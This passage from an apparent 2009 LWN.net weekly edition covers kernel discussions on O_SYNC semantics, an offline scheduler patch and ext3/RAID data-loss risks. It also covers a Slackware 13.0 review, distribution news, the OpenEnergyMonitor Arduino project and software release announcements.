- O_RSYNC: this flag, which only affects read operations, must be used in combination with either O_SYNC or O_DSYNC. It will cause a read() call to block until the data (and maybe metadata) being read has been flushed to disk (if necessary). This flag thus gives the kernel the option of delaying the flushing of data to disk; any number of writes can happen, but data need not be flushed until the application reads it back.
O_DSYNC and O_RSYNC are not new; they were added to the relevant standards well over ten years ago. But Linux has never really supported them (they are optional features), so glibc simply defines them both to be the same as O_SYNC.
Christoph Hellwig is working on a proper implementation of these flags, with an eye toward merging the changes in 2.6.32. It should be a relatively straightforward change at this point; the kernel has some nice infrastructure for handling data and metadata flushing now. What is potentially harder is making the change in a way which best meets the expectations of existing applications.
There are two unrelated issues which make this transition harder than one might expect it should be:
- Linux has never actually implemented O_SYNC; what applications have been getting, instead, is O_DSYNC.
- The open() implementation in the kernel simply ignores flags that it knows nothing about. This behavior can be changed only at risk of breaking unknown numbers of applications; it's an aspect of the kernel ABI.
Given the first problem listed above, one might be tempted to make a new flag for O_DSYNC and use it to obtain the current behavior, while O_SYNC would get the full metadata synchronization semantics. If this were to be done, though, applications which are built against a new C library but run on an older kernel would be presenting an unknown flag to open(), which would duly ignore it. That application would not get synchronous I/O behavior at all, which is almost certainly not a good thing. So something trickier will have to be done.
There is also the question of which semantics older applications should get. Jamie Lokier argued that applications requesting O_SYNC behavior wanted full metadata synchronization, even if the kernel has been cheating them out of the full experience. So, when running under a future kernel with a proper O_SYNC implementation, an old, binary application should get O_SYNC behavior. Ulrich Drepper, instead, thinks that behavior should not change for older applications:
It looks like Ulrich's view will win out, for the simple reason that the performance cost of the additional metadata synchronization seems worse than giving applications the semantics they have been running with anyway, even if those semantics are not quite what was promised.
Christoph outlined the likely course of action. Internally, O_SYNC will become O_DSYNC, and the open() flag which is currently O_SYNC will come to mean O_DSYNC. The open() system call will then take a new flag (name unknown; O_FULLSYNC and O_ISYNC have been suggested) which will be hidden from applications. At the glibc level, applications will see this:
#define O_SYNC (O_FULLSYNC|O_DSYNC)
On older kernels, the O_DSYNC flag (with the same value as O_SYNC now) will yield the same behavior as always, while O_FULLSYNC will be ignored. On newer kernels, the new flag will yield the full O_SYNC semantics. As long as applications do not reach under the hood and try to manipulate the O_FULLSYNC flag directly, all will be well.
The offline scheduler
One of the primary functions of any kernel is to manage the CPU resources of the hardware that it is running on. A recent patch, proposed by Raz Ben-Yehuda, would change that, by removing one or more CPUs out from under the kernel's control, so that processes could run, undisturbed, on those processors. The "offline scheduler", as Ben-Yehuda calls his patch, had some rough sailing in the initial reactions to the idea, but as the thread on linux-kernel evolved, kernel hackers stepped back and looked at the problems it is trying to solve—and came up with other potential solutions.
The basic idea behind the offline scheduler is fairly straightforward: use the CPU hot-unplug facility to remove the processor from the system, but instead of halting the processor, allow other code to be run on it. Because the processor would not be participating in the various CPU synchronization schemes (RCU, spinlocks, etc.), nor would it be handling interrupts, it can completely devote its attention to the code that it is running. The idea is that code running on the offline processor would not suffer from any kernel-introduced latencies at all.
The core patch is fairly small. It provides an interface to register a function to be called when a particular CPU is taken offline:
int register_offsched(void (*offsched_callback)(void), int cpuid);
This registers a callback that will be made when the CPU with the given cpuid is taken offline (i.e. hot unplugged). Typically, a user would load a module that calls register_offsched(), then take the CPU offline, which triggers the callback on the just-offlined CPU. When the processing completes and the callback returns, the processor will be halted. At that point, the CPU can be brought back online and returned to the kernel's control.
The interface points to one of the problems that potential users of the offline scheduler have brought up: one can only run kernel-context, and not user-space, code using the facility. Because many of the applications that might benefit from having the full attention of a CPU are existing user-space programs, making the switch to in-kernel code is seen as problematic.
Ben-Yehuda notes that the isolated processor has "access to every piece of memory in the system" and the kernel would still have access to any memory that the isolated processor is using. He sees that as a benefit, but others, particularly Mike Galbraith, see it differently:
One of the main problems that some kernel hackers see with the offline scheduler approach is that it bypasses Linux entirely. That is, of course, the entire point of the patch: devoting 100% of a CPU to a particular job. As Christoph Lameter puts it:
Peter Zijlstra, though, sees that as a major negative: "Going around the kernel doesn't benefit anybody, least of all Linux." There are existing ways to do the same thing, so adding one into the kernel adds no benefit, he says:
But, Ben-Yehuda sees multiple applications for processors dedicated to specific tasks. He envisions a different kind of system, which he calls a Service Oriented System (SOS), where the kernel is just one component, and if the kernel "disturbs" a specific service, it should be moved out of the way:
Moving the kernel out of the way is not particularly popular with many kernel hackers. But the idea of completely dedicating a processor to a specific task is important to some users. In the high performance computing (HPC) world, multiple processors spend most of their time working on a single, typically number-crunching, task. Removing even minimal interruptions, those that perform scheduling and other kernel housekeeping tasks, leads to better overall performance. Essentially, those users want the convenience of Linux running on one CPU, while the rest of the system's CPUs are devoted to their particular application.
After a somewhat heated digression about generally reducing latencies in the kernel, Andrew Morton asked for a problem statement: "All I've seen is 'I want 100% access to a CPU'. That's not a problem statement - it's an implementation."

In answer, Chris Friesen described one possible application:
We gave it as close to a whole cpu as we could using cpu and irq affinity and we used message queues in shared memory to allow another cpu to handle I/O. In our case we still had kernel threads running on the app cpu, but if we'd had a straightforward way to avoid them we would have used it.
That led Thomas Gleixner to consider an alternative approach. He restated the problem as: "Run exactly one thread on a dedicated CPU w/o any disturbance by the scheduler tick." Given that definition, he suggested a fairly simple approach:
Gregory Haskins then suggested modifying the FIFO scheduler class, or creating a new class with a higher priority, so that it disables the scheduler tick. That would incorporate Gleixner's idea into the existing scheduling framework. As might be guessed, there are still some details to work out on running a process without the scheduler tick, but Gleixner and others think it is something that can be done.
The offline scheduler itself kind of fell by the wayside in the discussion. Ben-Yehuda, unsurprisingly, is still pushing his approach, but aside from the distaste expressed about circumventing the kernel, the inability to run user-space code is problematic. Gleixner was fairly blunt about it:
Others are also thinking about the problem, as a similar idea to Gleixner's was recently posted by Josh Triplett in an RFC to linux-kernel. Triplett's tiny patch simply disables the timer tick permanently as a demonstration of the gain in performance that can be achieved for CPU-bound processes. He notes that the overhead for the timer tick can be significant:
Triplett warns that his patch "by no means represents a complete solution" in that it breaks RCU, process accounting, and other things. But it does boot and can run his tests. He has fixes for some of those problems in progress, as well as an overall goal: "I'd like to work towards a patch which really can kill off the timer tick, making the kernel entirely event-driven and removing the polling that occurs in the timer tick. I've reviewed everything the timer tick does, and every last bit of it could occur using an event-driven approach."
It is pretty unlikely that we will see the offline scheduler ever make it into the mainline, but the idea behind it has spawned some interesting discussions that may lead to a solution for those looking to eliminate kernel overhead on some CPUs. In many ways, it is another example of the perils of developing kernel code in isolation. Had Ben-Yehuda been working in the open, and looking for comments from the kernel community, he might have realized that his approach would not be acceptable—at least for the mainline—much sooner.
Ext3 and RAID: silent data killers?
Technologies such as filesystem journaling (as used with ext3) or RAID are generally adopted with the purpose of improving overall reliability. Some system administrators may thus be a little disconcerted by a recent linux-kernel thread suggesting that, in some situations, those technologies can actually increase the risk of data loss. This article attempts to straighten out the arguments and reach a conclusion about how worried system administrators should be.

The conversation actually began last March, when Pavel Machek posted a proposed documentation patch describing the assumptions that he saw as underlying the design of Linux filesystems. Things went quiet for a while, before springing back to life at the end of August. It would appear that Pavel had run into some data-loss problems when using a flash drive with a flaky connection to the computer; subsequent tests done by deliberately removing active drives confirmed that it is easy to lose data that way. He hadn't expected that:
In an attempt to prevent a surge in refund requests at universities worldwide, Pavel tried to get some warnings put into the kernel documentation. He has run into a surprising amount of opposition, which he (and some others) have taken as an attempt to sweep shortcomings in Linux filesystems under the rug. The real story, naturally, is a bit more complex.
Journaling technology like that used in ext3 works by writing some data to the filesystem twice. Whenever the filesystem must make a metadata change, it will first gather together all of the block-level changes required and write them to a special area of the disk (the journal). Once it is known that the full description of the changes has made it to the media, a "commit record" is written, indicating that the filesystem code is committed to the change. Once the commit record is also safely on the media, the filesystem can start writing the metadata changes to the filesystem itself. Should the operation be interrupted (by a power failure, say, or a system crash or abrupt removal of the media), the filesystem can recover the plan for the changes from the journal and start the process over again. The end result is to make metadata changes transactional; they either happen completely or not at all. And that should prevent corruption of the filesystem structure.
One thing worth noting here is that actual data is not normally written to the journal, so a certain amount of recently-written data can be lost in an abrupt failure. It is possible to configure ext3 (and ext4) to write data to the journal as well, but, since the performance cost is significant, this option is not heavily used. So one should keep in mind that most filesystem journaling is there to protect metadata, not the data itself. Journaling does provide some data protection anyway - if the metadata is lost, the associated data can no longer be found - but that's not its primary reason for existing.
It is not the lack of journaling for data which has created grief for Pavel and others, though. The nature of flash-based storage makes another "interesting" failure mode possible. Filesystems work with fixed-size blocks, normally 4096 bytes on Linux. Storage devices also use fixed-size blocks; on traditional rotating media, those blocks have long been 512 bytes in length, though larger block sizes are on the horizon. The key point is that, on a normal rotating disk, the filesystem can write a block without disturbing any unrelated blocks on the drive.
Flash storage also uses fixed-size blocks, but they tend to be large - typically tens to hundreds of kilobytes. Flash blocks can only be rewritten as a unit, so writing a 4096-byte "block" at the operating system level will require a larger read-modify-write cycle within the flash drive. It is certainly possible for a careful programmer to write flash-drive firmware which does this operation in a safe, transactional manner. It is also possible that the flash drive manufacturer was rather more interested in getting a cheap device to market quickly than careful programming. In the commodity PC hardware market, that possibility becomes something much closer to a certainty.
What this all means is that, on a low-quality flash drive, an interrupted write operation could result in the corruption of blocks unrelated to that operation. If the interrupted write was for metadata, a journaling filesystem will redo the operation on the next mount, ensuring that the metadata ends up in its intended destination. But the filesystem cannot know about any unrelated blocks which might have been trashed at the same time. So journaling will not protect against this kind of failure - even if it causes the sort of metadata corruption that journaling is intended to prevent.
This is the "bug" in ext3 that Pavel wished to document. He further asserted that journaling filesystems can actually make things worse in this situation. Since a full fsck is not normally required on journaling filesystems, even after an improper dismount, any "collateral" metadata damage will go undetected. At best, the user may remain unaware for some time that random data has been lost. At worst, corrupt metadata could cause the code to corrupt other parts of the filesystem over the course of subsequent operation. The skipped fsck may have enabled the system to come back up quickly, but it has done so at the risk of letting corruption persist and, possibly, spread.
One could easily argue that the real problem here is the use of hidden translation layers to make a flash device look like a normal drive. David Woodhouse did exactly that:
The manufacturers of flash drives have, thus far, proved impervious to this line of reasoning, though.
There is a similar failure mode with RAID devices which was also discussed. Drives can be grouped into a RAID5 or RAID6 array, with the result that the array as a whole can survive the total failure of any drive within it. As long as only one drive fails at a time, users of RAID arrays can rest assured that the smoke coming out of their array is not taking their data with it.
But what if more than one drive fails? RAID works by combining blocks into larger stripes and associating checksums with those stripes. Updating a block requires rewriting the stripe containing it and the associated checksum block. So, if writing a block can cause the array to lose the entire stripe, we could see data loss much like that which can happen with a flash drive. As a normal rule, this kind of loss will not occur with a RAID array. But it can happen if (1) one drive has already failed, causing the array to run in "degraded" mode, and (2) a second failure occurs (Pavel pulls the power cord, say) while the write is happening.
Pavel concluded from this scenario that RAID devices may actually be more dangerous than storing data on a single disk; he started a whole separate subthread (under the subject "raid is dangerous but that's secret") to that effect. This claim caused a fair amount of concern on the list; many felt that it would push users to forgo technologies like RAID in favor of single, non-redundant drive configurations. Users who do that will avoid the possibility of data loss resulting from a specific, unlikely double failure, but at the cost of rendering themselves entirely vulnerable to a much more likely single failure. The end result would be a lot more data lost.
The real lessons from this discussion are fairly straightforward:
- Treat flash drives with care, do not expect them to be more reliable than they are, and do not remove them from the system until all writes are complete.
- RAID arrays can increase data reliability, but an array which is not running with its full complement of working, populated drives has lost the redundancy which provides that reliability. If the consequences of a second failure would be too severe, one should avoid writing to arrays running in degraded mode.
- As Ric Wheeler pointed out, the easiest way to lose data on a Linux system is to run the disks with their write cache enabled. This is especially true on RAID5/6 systems, where write barriers are still not properly supported. There has been some talk of disabling drive write caches and enabling barriers by default, but no patches have been posted yet.
- There is no substitute for good backups. Your editor would add that any backups which have not been checked recently have a strong chance of not being good backups.
How this information will be reflected in the kernel documentation remains to be seen. Some of it seems like the sort of system administration information which is not normally considered appropriate for inclusion in the documentation of the kernel itself. But there is value in knowing what assumptions one's filesystems are built on and what the possible failure modes are. A better understanding of how we can lose data can only help us to keep that from actually happening.
Patches and updates
Kernel trees
Architecture-specific
Core kernel code
Development tools
Device drivers
Filesystems and block I/O
Memory management
Networking
Security-related
Virtualization and containers
Miscellaneous
Page editor: Jonathan Corbet
Distributions
News and Editorials
Slackware 13.0: now officially 64-bit
Patrick Volkerding has announced the release of Slackware 13.0, which means that Slackware continues its record as the oldest Linux distribution to be actively maintained. Compared with release 12.2 from the end of last year, Slackware has undergone a major overhaul: X can be autoconfigured now, this is the first 64-bit release, and the desktop environment has taken the leap to the KDE 4 branch.
64-bit and multilib
In particular, the 64-bit release is a big change. While many other distributions have had x86_64 releases for years, Slackware users were forced to wait for an official x86_64 port or choose an unofficial 64-bit project such as Slamd64 or Sflack. Now they can officially join their peers in the 64-bit world. This is largely due to Eric Hameleers, who changed the SlackBuild scripts to support the x86_64 architecture, recompiled everything, tested the 64-bit packages, and stayed in sync with the 32-bit Slackware repository. His improvements to the build scripts were even merged back into the 32-bit Slackware release. Now the only difference is whether $ARCH is set to i486 or x86_64. Hameleers's build scripts are used in other ports too, such as Armedslack, the official port of Slackware to the ARM architecture, as well as Slack/390, a port for IBM S/390 G2 class systems and above. Slackware developers are already dreaming about a unified source tree for the different ports.
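That single $ARCH difference can be pictured as the kind of case switch a SlackBuild-style script uses. This is purely illustrative (the function name is invented here), not the actual build-script code:

```shell
# slack_libdir: print the library directory for a given $ARCH value,
# mirroring the i486/x86_64 switch described above. Illustrative only;
# the real scripts additionally set compiler flags per architecture.
slack_libdir() {
    case "$1" in
        x86_64) echo "/usr/lib64" ;;  # 64-bit libraries on Slackware64
        *)      echo "/usr/lib"   ;;  # i486 and everything else
    esac
}
```

So `slack_libdir x86_64` prints /usr/lib64, while `slack_libdir i486` prints /usr/lib.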
Users should know that the x86_64 port of Slackware is a pure 64-bit operating system, but it is "multilib-ready". Hameleers explains this on his website:
Moreover, users don't have to compile all the 32-bit packages they need from scratch; they can simply take them from the 32-bit Slackware package tree. The only thing the user has to do to create a multilib Slackware64 install is to upgrade gcc and glibc to their multilib versions and install a 32-bit compatibility toolkit, compat32-tools. Detailed instructions can be found on Hameleers's website. The whole process is not as simple as it could be, but it's done "the Slack way": Slackware is multilib-ready and lets the user choose how to make use of it.
KDE 4
Another big change is the move from KDE 3 to KDE 4, which has been out for about a year and a half now. The always conservative Volkerding explains why the time is ripe now for the move:
However, Volkerding notes that KDE 4 still has some quirks. There are reports that the CD-burning tool K3b hasn't been working as well as the KDE 3 version, and other applications have fewer features in their KDE 4 versions. That's why Slackware keeps some KDE 3 compatibility packages in /extra/kde3-compat/, including a KDE 3 version of K3b.
By the way, GNOME users aren't completely left out. Although the GNOME desktop environment was removed from Slackware in 2005, several community-based projects have filled the gap. For example, GNOME SlackBuild has released an up-to-date GNOME 2.26.3 for Slackware 13.
Installation
The text-mode installer has remained largely unchanged. It lets the user choose a non-US keyboard map and try out the keyboard layout before committing to it. Then the user has to prepare the disk partitions (e.g. with fdisk or cfdisk) and type setup to begin the installation process. The installer makes use of virtual consoles: the first three consoles are login consoles, while the fourth console shows informational messages such as disk formatting status and kernel messages. The login consoles come in handy during the installation, e.g. to check how full the hard drive is with df or to use the commands on the Slackware CD-ROM that is mounted on /cdrom.
The installation is straightforward: the user selects the root partition, formats it with the filesystem of his choice (ext4 is the default), selects the source medium, and chooses the packages to install. For a full-blown KDE 4 installation, the simplest way is to choose "Full" in the KDE list. Then all packages get installed, each showing an information window as it installs. A disadvantage of the installer is that it doesn't show a progress bar, leaving the user to guess how long the wait will be. Afterward, the user gets the option to create a USB boot stick for recovery purposes, and Slackware installs the LILO boot loader. Finally, the user configures the system and chooses the desktop environment.
Under the hood, the Slackware installer has implemented some changes. For example, it now uses udev to populate /dev and manage devices, including network interface cards. This means that the user no longer has to run network scripts prior to running setup. If the installer finds a DHCP server on the local network, the setup program lets the user choose between using DHCP or specifying a static IP address. For those who don't want to use udev, it's still possible to use the old Slackware hardware configuration scripts by adding the parameter noudev to the installer command line.
Back on track
Slackware features Linux kernel 2.6.29.6, GNU libc 2.9, KDE 4.2.4, Xfce 4.6.1, Firefox 3.5.2, Thunderbird 2.0.0.23, Gimp 2.6.6, and a lot of other recent packages. Look at the complete list of packages or the list of changes and hints for detailed information. Slackware 13 uses X.Org X Server 1.6.3, which means that it doesn't require an /etc/X11/xorg.conf in most cases. Input devices are configured by HAL, while the X server autoconfigures the rest. With the move to HAL in Slackware 12 and the autoconfigurable X server in Slackware 13, more and more things are now working out-of-the-box.
Slackware is known for its conservative choices, and the move to KDE 4.2 signifies that even the conservative Volkerding deems the new KDE 4 branch good enough. However, while almost all Linux distributions are using GRUB now and some are even moving to GRUB 2, Slackware 13 is still lagging behind with its use of the LILO boot loader by default. The developers surely have their reasons (Slackware holds to the "tried and true" standard for what gets included in the distribution), but, all in all, Slackware seems to be back on track with other recent distributions without belying its nature as a BSD-like Linux distribution.
New Releases
Slackware 13.0 released
The Slackware 13.0 release is out. "Probably the biggest change is the addition of an official 64-bit port. While the 32-bit (x86) version continues to be developed, this release brings to you a complete port to 64-bit (x86_64). We know that many of you have been waiting eagerly for this, and once you try it you'll see it was well worth the wait." See the release notes for more information.
RHEL 5.4 released
Red Hat Enterprise Linux 5.4 is out. They have folded a lot of changes into this release, including x86_64 KVM support, FUSE, the XFS filesystem, a number of SystemTap enhancements, and a lot of driver updates; see the release notes for details.
For CentOS users: the word is that CentOS 5.4 will be available "in 2-4 weeks or so, when it's ready".
The first Lubuntu test images are available
The Lubuntu project has announced the availability of its first test images. "The Lubuntu project started in March 2009, with the purpose of creating a lighter and less resource demanding alternative to the Xubuntu operating system, using the LXDE desktop environment. The ultimate goal of this project is to join the ranks of Kubuntu and Xubuntu and become an officially supported derivative of Ubuntu. The developers claim that, while Xubuntu is often represented as a lightweight distro, it actually fails to run on older hardware, so they are targeting their Linux distribution at older legacy computers and devices with less than 256 MB of RAM."
Version 2.4.37.5 of Crash Recovery Kit for Linux
The Crash Recovery Kit project has released CRK for Linux v2.4.37.5. "CRK v.2.4.37.5-rh73 i386, is based upon RedHat 7.3 i386. The kernel is patched with linux-2.4.37.5-e1000e.patch.bz2, based on the Intel driver v0.5.11.2, for Intel(R) PRO/1000 PCIe Gigabit Ethernet and works with the Intel 82574L PCIe Gigabit card."
Distribution News
Debian GNU/Linux
New NM Front-desk Member
The Debian New-Maintainer Front-desk has announced that Enrico Zini has joined the team.
Fedora
The Fedora Project and IPv6
The Fedora Project has announced that major segments of fedoraproject.org and the Fedora Project infrastructure now support IPv6. "We will continue to further expand support for IPv6 over the next several months wherever possible. Most of our self-hosted websites have already been converted, and we plan to include IPv6 GeoIP support in MirrorManager soon."
Gentoo Linux
Gentoo Council Meeting Summary
Click below for a summary of the August 17, 2009 meeting of the Gentoo Council. Topics include Gentoo's tenth anniversary.
Ubuntu family
Ubuntu TechBoard 2009
The Ubuntu Technical Board elections have been completed. Elected to the new board are Matt Zimmerman, Mark Shuttleworth, Scott James Remnant, Martin Pitt and Kees Cook.
Other distributions
MontaVista Announces New Market Specific Distributions
MontaVista has announced the general availability of new Market Specific Distributions for MontaVista Linux 6. These distributions support numerous ARM, Intel, Freescale, MIPS and Xilinx platforms.
Distribution Newsletters
DistroWatch Weekly, Issue 318
The DistroWatch Weekly for August 31, 2009 is out. "Operating systems come in many different shapes and sizes. While there is no shortage of projects seemingly wanting to test the upper limits of modern hardware requirements, it's not every day that we discover exactly the opposite. Welcome to Kolibri - a bootable operating system in under 3 MB of download, requiring just 5 MB of hard disk space and less than 10 MB of RAM! Read on to find out more about this extraordinary project. In the news section, Slackware hits the magic 13 with a plethora of new features, Fedora announces the inclusion of a Moblin subsystem into its upcoming version 12, ClarkConnect undergoes a name change and renews its commitment to open source, Arch Linux introduces a new server-oriented kernel for better long term support, and BeleniX launches an early alpha build of its OpenSolaris-based distribution featuring KDE 4. Finally, if you run FreeBSD and want to keep your installed system constantly updated, don't miss a great document describing the various options. Happy reading!"
Fedora Weekly News 191
The Fedora Weekly News for August 30, 2009 is out. "We kick off this week's issue with the latest news on the Fedora 12 Alpha release from this past Tuesday, as well as detail on the upcoming Red Hat/Fedora/JBoss conference in Brno, Czech Republic. News from the Marketing team includes logs of the recent weekly meeting, Fedora 12 talking points development, and a Fedora Insight update. In Quality Assurance news, detail from last week's Test Day, on Dracut, and the next Test Day this week on Sugar on a Stick. Also much detail on this week's QA meetings, and reporting on the ABRT Test Day. In Translation news, detail on a new version of Transifex, and coverage of some discussion of the prioritization of packages available for translation. News from the Design team includes a new Fedora 12 Alpha banner and news on a Fedora survey aimed to improve the usability of the Fedora download pages. These are just a few items from this week's FWN!"
OpenSUSE Weekly News/86
This issue of the OpenSUSE Weekly News covers openSUSE 11.2 Milestone 6 Released, Jan Weber: Summary of openSUSE @ FrOSCon 2009, Linux.com/RobDay: The Kernel Newbie Corner: Kernel Debugging with proc "Sequence" Files--Part 2, Will Stephenson: Sub-menus in KDE 4 panels and desktops are back, h-online/Thorsten Leemhuis: Kernel Log - Coming in 2.6.31 - Part 4: Tracing, architecture, virtualisation, and more.
Ubuntu Weekly Newsletter #157
The Ubuntu Weekly Newsletter for August 29, 2009 is out. "In this issue we cover: Karmic: Feature Freeze in place - Alpha 5 freeze ahead, Ubuntu Pennsylvania Open Source Conference, Ubuntu Arizona Installfest, Ubuntu Mexico Podcast #1, Ubuntu Georgia UbuCon at Atlanta Linuxfest, Launchpad news, Ubuntu Forums news, Ubuntu at Parliament of Zimbabwe, Full Circle Magazine #28, Ubuntu UK podcast: Slipback, August 2009 Team Reports, and much, much more!"
Distribution reviews
SAM Linux - Great little OS (TuxMachines.org)
Susan Linton reviews SAM Linux. "SAM is based on PCLOS and as such retains some of the telltale signs - some application splash screens, the PCLOS/Mandriva hard drive installer, Synaptic, and PCLOS' version of the Mandriva Control Center. These are great and probably indispensable, but it's the uniquely SAM characteristics that really seemed to shine."
Revisiting Linux Part 1: A Look at Ubuntu 8.04 (AnandTech)
AnandTech has a lengthy look at Ubuntu 8.04 LTS from a Windows user's perspective. "[This article is] first and foremost a review of Ubuntu 8.04. And with 9.04 being out, I'm sure many of you are wondering why we're reviewing anything other than the latest version of Ubuntu. The short answer is that Ubuntu subscribes to the "publish early, publish often" mantra of development, which means there are many versions, not all of which are necessarily big changes. 8.04 is a Long Term Support release; it's the most comparable kind of release to a Windows or Mac OS X release. This doesn't mean 9.04 is not important (which is why we'll get to it in Part 2), but we wanted to start with a stable release, regardless of age. We'll talk more about this when we discuss support."
Page editor: Rebecca Sobol
Development
The OpenEnergyMonitor project
The OpenEnergyMonitor project is based on the work of two developers, Trystan Lea and Suneil, both from Wales. "This is a project to develop and build open source energy monitoring and analysis tools for energy efficiency and distributed renewable microgeneration." The project appears to have been launched in the summer of 2009.
The OpenEnergyMonitor project's graphic [PDF] describes the goals, which include:
- Monitoring AC mains for energy analysis purposes.
- Energy prediction for renewable energy feasibility studies (Planned).
- Monitoring energy captured from wind, solar water and photovoltaic sources.
- Storage, analysis and display of energy usage data.
- Development of energy technologies.
- The export of energy usage information to the Internet (Planned).
The OpenEnergyMonitor site lists several example projects:
- Non-invasive AC mains current measurement
- Invasive AC mains power measurement
- Invasive 12V DC power measurement
- Load controller for small wind generators
OpenEnergyMonitor features a simple structure that is built from a variety of open-source hardware and software components. The data flow through the system starts with an Arduino processor and a custom built I/O shield for interfacing the analog signal to the Arduino. The Arduino sends data to the host computer via a USB serial connection.
The project provides several ways to collect and display the power data. The simpler batch mode works as follows: The ArduinoComm Java program can be used to copy a batch of recorded data to a file using a command such as:
$ java ArduinoComm >tmp.dat
Graphing of the captured data can be done with the KDE utility kst; see the Using KST for graphing document for details.
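For a quick look before graphing, the batch file can also be summarized from the shell. This sketch assumes, hypothetically, one numeric reading per line in tmp.dat; the actual ArduinoComm output format may differ:

```shell
# average_power: print the mean of the first column of a capture file.
# The one-reading-per-line format is an assumption for illustration.
average_power() {
    awk '{ sum += $1; n++ } END { if (n) printf "%.1f\n", sum / n }' "$1"
}
```

For a file holding the readings 120, 180, and 150, average_power prints 150.0.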
A more interactive real-time display can be achieved using the PowerLogger and PowerSampler Java programs. A test installation of both programs was performed on an Ubuntu 9.04 system, following the OpenEnergyMonitor Java software guide. Each program requires installation of the associated Arduino program (sketch) on the Arduino board. Your author had several Arduino Diecimila boards around from other projects and an already-installed version 17 of the Arduino IDE. The Arduino Power Logger program (sketch) was retrieved, compiled, and installed on the Diecimila board without any problems.
Next, Java was installed on the machine along with the RXTX serial/parallel communication library. The Java code was compiled and run with the java ContinuousPower command. The ContinuousPower GUI showed up and, after a click on the Start button, the Arduino status indicated that a connection was established and a flow of data was seen from the Arduino board. The real-time graph's X axis changed with advancing time and the data varied slightly due to noise. Unfortunately, your author did not have the parts on hand to construct an input shield board, so monitoring of real data was not possible. The PowerSampler program was compiled and installed with similar results.
For more information on the inner workings of the Java software, see the Power Logger Source Code Guide and the Program Structure and Data Flow Diagram. The latter explains both the Power Logger and Power Sampler Java programs since both share a large percentage of source code.
OpenEnergyMonitor is an interesting project in the early stages of development. It comes along at a time when the renewable energy field is seeing a lot of growth, and efficiency monitoring of non-renewable sources is becoming more important for both financial and ecological reasons. Hopefully, future releases of OpenEnergyMonitor will include a wider variety of supported sensor devices. A multi-channel temperature monitor would be useful for characterizing a variety of solar energy sources such as photovoltaic, hydronic (hot water) and solar-heated air panels.
The OpenEnergyMonitor project could also be useful for providing a base of working code for a more generic Arduino-based data logger, and the real-time data visualization capabilities are an added bonus. A thread on the Arduino forum about an Open Source Data Logger Project Using the Arduino indicates some potential interest, but that project apparently never got off the ground.
System Applications
Audio Projects
ALSA 1.0.21 released
Version 1.0.21 of ALSA has been announced; see the change log for details.
MPD 0.15.3 released
Version 0.15.3 of MPD, a server-side application for playing music, has been announced. "Improves update speed and fixes an audio stuttering bug."
Database Software
PostgreSQL Weekly News
The August 30, 2009 edition of the PostgreSQL Weekly News is online with the latest PostgreSQL DBMS articles and resources.
Networking Tools
RunPON 0.4 released
Version 0.4 of RunPON has been announced. "In this version: introduced a .INI configuration file and a GUI to handle it. Moreover, it's possible to keep track of the cumulative connection time. RunPON is a small Python program useful to run the pon/poff scripts. It shows the elapsed connection time and periodically checks if a given network interface is still active."
Printing
CUPS 1.4.0 released
Version 1.4.0 of the CUPS printing system has been announced. "CUPS 1.4.0 adds over 67 changes and new features to CUPS 1.3.11, including improved Bonjour/DNS-SD support, supply level and status reporting for network printers via SNMP, an improved web interface, and the CUPS DDK tools."
Desktop Applications
Accessibility
Alt_Key 2.2.1 released
Version 2.2.1 of Alt_Key has been announced. "Alt_Key is a GUI program that shows where keyboard accelerators should go in menu option texts and dialog labels. The program instantly produces optimal results on the basis that the best accelerator is the first character, the second best is the first character of a word, the third best is any character, the worst is no accelerator at all, and no accelerator should be used more than once. With this program developers can help improve usability for users who can't use the mouse and for fast typists who don't want to use the mouse."
Audio Applications
Audacity 1.3.9 beta released
Beta version 1.3.9 of the Audacity audio editor has been announced. "It contains many bug fixes contributed by our two Google Summer of Code (GSoC) 2009 students, and brings us much closer to the goal of a new Stable 2.0 release."
QARecord 0.5.0 released
Version 0.5.0 of QARecord has been announced; it adds a number of new capabilities. "QARecord is a simple but solid recording tool. It works well with stereo and multichannel recordings, supporting ALSA and JACK interfaces and in both 16 bit and 32 bit mode. By using a large ringbuffer for the captured data, buffer overruns are avoided. It has a Qt based GUI with graphical peak meters."
Desktop Environments
GNOME Software Announcements
The following new GNOME software has been announced this week:
- anjuta 2.27.91 (bug fixes)
- Byzanz 0.2.0 (new features and bug fixes)
- gitg 0.0.5 (bug fixes)
- GLib 2.20.5 (bug fixes and translation work)
- glibmm 2.21.4.1 (code cleanup and documentation work)
- glibmm 2.21.4.2 (build fix)
- gnome-main-menu 0.9.13 (bug fixes and translation work)
- GNOME Shell 2.27.1 (new features, bug fixes and translation work)
- GTK+ 2.16.6 (bug fixes and translation work)
- GTK+ 2.17.10 (new features, bug fixes and translation work)
- gtkmm 2.17.9.3 (documentation work)
- Libgda 4.0.4 (bug fixes)
- libgdamm 3.99.17.1 (code cleanup and documentation work)
- libsigc++ 2.2.4.1 (code cleanup and documentation work)
- libsigc++ 2.2.4.2 (documentation work)
- librsvgmm 2.26.0.1 (bug fix)
- mm-common 0.7.1 (bug fix)
- mm-common 0.7.2 (documentation work)
- Mutter 2.27.3 (new features and bug fixes)
- pangomm 2.25.1.3 (documentation work)
- PyClutter 1.0.0 (new features and code cleanup)
- rep-gtk 0.90.0 (new features and code cleanup)
- sawfish 1.5.1 (bug fixes)
- Tic tac toe 0.3.1 (initial release)
KDE 4.3.1 provides a wave of improvements
Version 4.3.1 of KDE has been announced. "A month has passed since the release of KDE 4.3.0, so today the KDE Community announces the immediate availability of KDE 4.3.1, a bugfix, translation and maintenance update for the latest generation of the most advanced and powerful free desktop."
KDE Software Announcements
The following new KDE software has been announced this week:
- digiKam 1.0.0-beta4 (unspecified)
- eXaro 2.0.0 (translation work)
- KAlarm 2.3.1 (new features and bug fixes)
- KDE Four Live 1.3.1 (updated to KDE 4.3.1 release)
- Kipi-Plugins 0.6.0 (unspecified)
- Linux unified kernel 0.2.4.1 (new features and bug fixes)
- Minitube 0.5 (unspecified)
- Qubladi Alpha (initial release)
- servicemenu-pdf 0.3.4 (bug fixes)
- Skrooge 0.5.0 (new features and bug fixes)
- System Monitor 2 1.0.3 (new features and bug fixes)
- WiFi Radar 2.0.s06 (unspecified)
Xorg Software Announcements
The following new Xorg software has been announced this week:
- applewmproto 1.4.1 (packaging changes)
- bigreqsproto 1.1.0 (packaging changes)
- damageproto 1.2.0 (packaging changes and documentation work)
- dmxproto 2.2.99.1 (packaging changes)
- evieext 1.1.0 (packaging changes)
- fontsproto 2.1.0 (packaging changes)
- libAppleWM 1.4.0 (header changes)
- libdmx 1.0.99.1 (header changes and documentation work)
- libdrm 2.4.13 (new features and bug fixes)
- libfontenc 1.0.5 (bug fixes and documentation work)
- libICE 1.0.6 (bug fixes and documentation work)
